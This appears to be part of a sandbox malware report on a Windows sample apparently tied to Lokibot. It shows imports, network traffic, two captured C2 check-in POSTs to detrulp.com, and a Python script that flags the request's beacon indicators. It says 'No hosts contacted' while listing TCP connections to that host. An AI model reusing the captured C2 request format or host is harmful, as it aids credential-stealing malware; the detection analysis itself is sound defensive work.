0x46d4d8 SetMenu
0x46d4dc SetForegroundWindow
0x46d4e0 SetFocus
0x46d4e4 SetCursor
0x46d4e8 SetClassLongA
0x46d4ec SetCapture
0x46d4f0 SetActiveWindow
0x46d4f4 SendMessageA
0x46d4f8 ScrollWindow
0x46d4fc ScreenToClient
0x46d500 RemovePropA
0x46d504 RemoveMenu
0x46d508 ReleaseDC
0x46d50c ReleaseCapture
0x46d518 RegisterClassA
0x46d51c RedrawWindow
0x46d520 PtInRect
0x46d524 PostQuitMessage
0x46d528 PostMessageA
0x46d52c PeekMessageA
0x46d530 OffsetRect
0x46d534 OemToCharA
0x46d538 MessageBoxA
0x46d53c MapWindowPoints
0x46d540 MapVirtualKeyA
0x46d544 LoadStringA
0x46d548 LoadKeyboardLayoutA
0x46d54c LoadIconA
0x46d550 LoadCursorA
0x46d554 LoadBitmapA
0x46d558 KillTimer
0x46d55c IsZoomed
0x46d560 IsWindowVisible
0x46d564 IsWindowEnabled
0x46d568 IsWindow
0x46d56c IsRectEmpty
0x46d570 IsIconic
0x46d574 IsDialogMessageA
0x46d578 IsChild
0x46d57c InvalidateRect
0x46d580 IntersectRect
0x46d584 InsertMenuItemA
0x46d588 InsertMenuA
0x46d58c InflateRect
0x46d594 GetWindowTextA
0x46d598 GetWindowRect
0x46d59c GetWindowPlacement
0x46d5a0 GetWindowLongA
0x46d5a4 GetWindowDC
0x46d5a8 GetTopWindow
0x46d5ac GetSystemMetrics
0x46d5b0 GetSystemMenu
0x46d5b4 GetSysColorBrush
0x46d5b8 GetSysColor
0x46d5bc GetSubMenu
0x46d5c0 GetScrollRange
0x46d5c4 GetScrollPos
0x46d5c8 GetScrollInfo
0x46d5cc GetPropA
0x46d5d0 GetParent
0x46d5d4 GetWindow
0x46d5d8 GetMenuStringA
0x46d5dc GetMenuState
0x46d5e0 GetMenuItemInfoA
0x46d5e4 GetMenuItemID
0x46d5e8 GetMenuItemCount
0x46d5ec GetMenu
0x46d5f0 GetLastActivePopup
0x46d5f4 GetKeyboardState
0x46d5fc GetKeyboardLayout
0x46d600 GetKeyState
0x46d604 GetKeyNameTextA
0x46d608 GetInputState
0x46d60c GetIconInfo
0x46d610 GetForegroundWindow
0x46d614 GetFocus
0x46d618 GetDlgItem
0x46d61c GetDesktopWindow
0x46d620 GetDCEx
0x46d624 GetDC
0x46d628 GetCursorPos
0x46d62c GetCursor
0x46d630 GetClipboardData
0x46d634 GetClientRect
0x46d638 GetClassNameA
0x46d63c GetClassInfoA
0x46d640 GetCapture
0x46d644 GetActiveWindow
0x46d648 FrameRect
0x46d64c FindWindowA
0x46d650 FillRect
0x46d654 EqualRect
0x46d658 EnumWindows
0x46d65c EnumThreadWindows
0x46d660 EndPaint
0x46d664 EnableWindow
0x46d668 EnableScrollBar
0x46d66c EnableMenuItem
0x46d670 DrawTextA
0x46d674 DrawMenuBar
0x46d678 DrawIconEx
0x46d67c DrawIcon
0x46d680 DrawFrameControl
0x46d684 DrawEdge
0x46d688 DispatchMessageA
0x46d68c DestroyWindow
0x46d690 DestroyMenu
0x46d694 DestroyIcon
0x46d698 DestroyCursor
0x46d69c DeleteMenu
0x46d6a0 DefWindowProcA
0x46d6a4 DefMDIChildProcA
0x46d6a8 DefFrameProcA
0x46d6ac CreatePopupMenu
0x46d6b0 CreateMenu
0x46d6b4 CreateIcon
0x46d6b8 ClientToScreen
0x46d6bc CheckMenuItem
0x46d6c0 CallWindowProcA
0x46d6c4 CallNextHookEx
0x46d6c8 BeginPaint
0x46d6cc CharNextA
0x46d6d0 CharLowerBuffA
0x46d6d4 CharLowerA
0x46d6d8 CharToOemA
0x46d6dc AdjustWindowRectEx
Library kernel32.dll:
0x46d6e8 Sleep
Library oleaut32.dll:
0x46d6f0 SafeArrayPtrOfIndex
0x46d6f4 SafeArrayGetUBound
0x46d6f8 SafeArrayGetLBound
0x46d6fc SafeArrayCreate
0x46d700 VariantChangeType
0x46d704 VariantCopy
0x46d708 VariantClear
0x46d70c VariantInit
Library ole32.dll:
0x46d714 CoTaskMemAlloc
0x46d718 CoCreateInstance
0x46d71c CoUninitialize
0x46d720 CoInitialize
Library comctl32.dll:
0x46d730 ImageList_Write
0x46d734 ImageList_Read
0x46d744 ImageList_DragMove
0x46d748 ImageList_DragLeave
0x46d74c ImageList_DragEnter
0x46d750 ImageList_EndDrag
0x46d754 ImageList_BeginDrag
0x46d758 ImageList_Remove
0x46d75c ImageList_DrawEx
0x46d760 ImageList_Replace
0x46d764 ImageList_Draw
0x46d774 ImageList_Add
0x46d77c ImageList_Destroy
0x46d780 ImageList_Create
0x46d784 InitCommonControls
Library comdlg32.dll:
0x46d78c GetSaveFileNameA
0x46d790 GetOpenFileNameA

Hosts

No hosts contacted.

TCP

Source  Source port  Destination  Hostname  Destination port
192.168.56.101 49180 91.195.240.117 detrulp.com 80
192.168.56.101 49182 91.195.240.117 detrulp.com 80
192.168.56.101 49184 91.195.240.117 detrulp.com 80
192.168.56.101 49194 91.195.240.117 detrulp.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://detrulp.com/m3-q/pin.php
POST /m3-q/pin.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: detrulp.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: F949D6FE
Content-Length: 196
Connection: close

http://detrulp.com/m3-q/pin.php
POST /m3-q/pin.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: detrulp.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: F949D6FE
Content-Length: 169
Connection: close
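The two captures differ only in Content-Length (196 and 169), which is what two separate check-ins with different payloads look like. Everything the sandbox signature keyed on is in the headers alone, so here is an added example (not the sandbox's rule set) that parses the captured request and lists the reasons it stands out: the POST with no Referer and the HTTP/1.0 version that the signature names, plus the fixed "Mozilla/4.08 (Charon; Inferno)" user agent and the Content-Key header, both long associated with Lokibot in public reporting and consistent with the Lokibot verdicts in the engine list above. The request text is copied from the capture; the body was not shown in the report and is omitted. The benign request used for comparison is constructed.

```python
"""Header-only triage of the captured POST. Added example; RAW_REQUEST is the
capture above without its (unshown) body, BENIGN_REQUEST is constructed."""

RAW_REQUEST = (
    "POST /m3-q/pin.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: detrulp.com\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: F949D6FE\r\n"
    "Content-Length: 196\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Constructed comparison: an ordinary browser navigation.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Referer: https://example.com/\r\n"
    "Accept: text/html\r\n"
    "\r\n"
)

LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"
# Registered HTTP content codings; "binary" is not one of them.
KNOWN_CONTENT_CODINGS = {"gzip", "x-gzip", "compress", "x-compress", "deflate",
                         "identity", "br", "zstd", "exi", "pack200-gzip", "aes128gcm"}


def parse_request(raw):
    """Split a raw request into (method, path, version, headers).
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def beacon_indicators(raw):
    """Return the list of reasons this request looks like a stealer check-in
    (empty for a request that shows none of them)."""
    method, path, version, h = parse_request(raw)
    reasons = []
    if method == "POST" and "referer" not in h:
        reasons.append("POST with no Referer header")
    if version == "HTTP/1.0":
        reasons.append("HTTP/1.0 request line (browsers have sent HTTP/1.1 or newer for years)")
    if h.get("user-agent") == LOKIBOT_UA:
        reasons.append(f"fixed Lokibot user agent '{LOKIBOT_UA}'")
    if "content-key" in h:
        reasons.append(f"non-standard Content-Key header ({h['content-key']})")
    coding = h.get("content-encoding", "").lower()
    if coding and coding not in KNOWN_CONTENT_CODINGS:
        reasons.append(f"Content-Encoding '{coding}' is not a registered HTTP content coding")
    if method == "POST" and h.get("content-type") == "application/octet-stream":
        reasons.append(f"opaque application/octet-stream body posted to {path}")
    return reasons


if __name__ == "__main__":
    for label, req in (("captured", RAW_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, beacon_indicators(req) or "no indicators")
```

The absence of Suricata and Snort alerts further down says nothing about detectability: a user agent this specific and a header name that no legitimate client sends are both rule-worthy on their own, and the body length can be ignored entirely.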

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.